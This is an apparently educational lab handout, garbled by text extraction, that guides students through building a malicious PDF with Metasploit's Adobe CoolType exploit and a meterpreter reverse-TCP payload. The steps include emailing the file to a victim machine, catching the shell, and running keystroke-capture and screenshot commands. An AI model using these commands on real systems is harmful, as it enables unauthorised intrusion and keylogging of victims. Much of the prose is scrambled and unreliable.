Project X1: Using a PDF Exploit with Metasploit What You Will Need

15 Points

A computer running Back rack ! as the attacker" anyone without permission! his coul# $e a real or %irtual machine" o &ou can get Back rack here: http:''www"$acktrack(linux"org'#ownloa#s o he Back rack )*+ ,ile is also a%aila$le in the *-1! la$. on the /Ms partition A computer running 0in#ows to $e the target" )t can $e a real or %irtual machine" ) use# a 0in 1 machine. $ut this exploit has $een reporte# to work on XP an# /ista also' he target machine must $e using Adobe Reader 9.3.4 or earlier 2to get ol# %ersions o, a#o$e. go to http:''www"ol#apps"com'a#o$e3rea#er"php4 he two computers must $e a$le to connect to one another o%er a network" Back rack ! #oesn5t start networking $6 #e,ault" )n a erminal win#ow. t6pe this comman# an# then press the Enter ke6: /etc/init.d/networking start his starts wire# networking" ), 6ou nee# wireless networking. 6ou must also issue this comman#: /etc/init.d/NetworkManager start o make sure 6ou are connecte# to the )nternet. t6pe this comman# an# then press the Enter ke6: ping google.com 0hen 6ou see replies. press 7trl87 to stop the pings" /etc/init.d/NetworkManager start 6pe this comman# an# then press the Enter ke6. as shown $elow on this page: ifconfig

Warning: Be careful! Don't attack

Connecting BackTrack to the Internet

1"

-"

Find Your IP Addre

9"

!"

Fin# the )P%! a##ress that connects to the )nternet" 0rite it in the $ox to the right on this page"

)P: 3333333333333333333333333

7:) 1-1 ( Bowne

Page 1 o, 9

Project X1: Using a PDF Exploit with Metasploit !"date #eta "loit
;" +n the Back rack ! machine. at a comman# prompt. t6pe this comman# an# then press the Enter ke6: msfconsole Metasploit launches. as shown to the right on this page" 6pe this comman# an# then press the Enter ke6: msfupdate 0ait ,or the up#ate to complete" hen exit ,rom ms,console an# re(start it"

15 Points

<"

1"

Creating the $%il P&F File

=" +n the Back rack ! machine. at a comman# prompt. t6pe these comman#s. pressing the Enter ke6 a,ter each one. as shown $elow on this page"" )n the thir# comman#. put 6our )P a##ress in instea# o, 192.168.1.1: use exploit/windows/fileformat/adobe_cooltype_sing set OUTPUTP T! /root set "#$%N M% e&il.pdf set $!O'T 192.168.1.1 set P ($O ) windows/meterpreter/re&erse_tcp exploit

&eli%ering the #aliciou P&F

>" +n the Back rack ! machine. click the Fire,ox icon" Email the PDF to 6our %ictim machine"

7:) 1-1 ( Bowne

Page - o, 9

Project X1: Using a PDF Exploit with Metasploit 'i ten (or the Target) Connection
1?"

15 Points

+n the Back rack ! machine. at a comman# prompt. t6pe these comman#s. pressing the Enter ke6 a,ter each one. as shown $elow on this page"" )n the secon# comman#. put 6our )P a##ress in instea# o, 192.168.1.1: use exploit/multi/*andler set $!O'T 192.168.1.1 set P ($O ) windows/meterpreter/re&erse_tcp set %xitOn'ession false exploit +,

$*ecuting the #aliciou P&F

11" 1-" +n the target computer. open the PDF ,ile in A#o$e @ea#er" +n the Back rack ! machine. 6ou shoul# see a A#eter"reter e ion + o"enedA message. as shown a$o%e on this page" Enter this comman#. an# then press the Enter ke6: sessions +i &ou now own the targetB Cere are some ,un meterpreter comman#s to tr6: s*ell Di%es 6ou a 0in#ows 7omman# Prompt on the target 1!" 1;" 1<" 11" 1=" screens*ot keyscan_start keyscan_dump Di%es 6ou an image o, the target5s #esktop Begins capturing ke6s t6pe# in the target *hows the ke6strokes capture# so ,ar

19"

,a%ing the ,creen I-age

Make sure the A#eter"reter e ion + o"enedA message is %isi$le" +n the Back rack ! machine. click ,tart. .,na" hot" Use a A7apture mo#eA o, AFull ,creenA" 7lick the ANe/ ,na" hotA $utton" )n the *creenshot win#ow. click the A,a%e A 0A $utton" *a%e the screenshot in the 1root ,ol#er. which is 6our #esktop" :ame it Yourname2 Pro34+.3"g

Turning in 5our Pro3ect

Email the EPED image to me as an attachment" *en# the message to cnit.+6+7g-ail.cowith a su$ject line o, Pro3 4+ Fro- Your Name" *en# a 7c to 6oursel," Fast mo#i,ie# 1?(1!(1? 7:) 1-1 ( Bowne Page 9 o, 9 1>"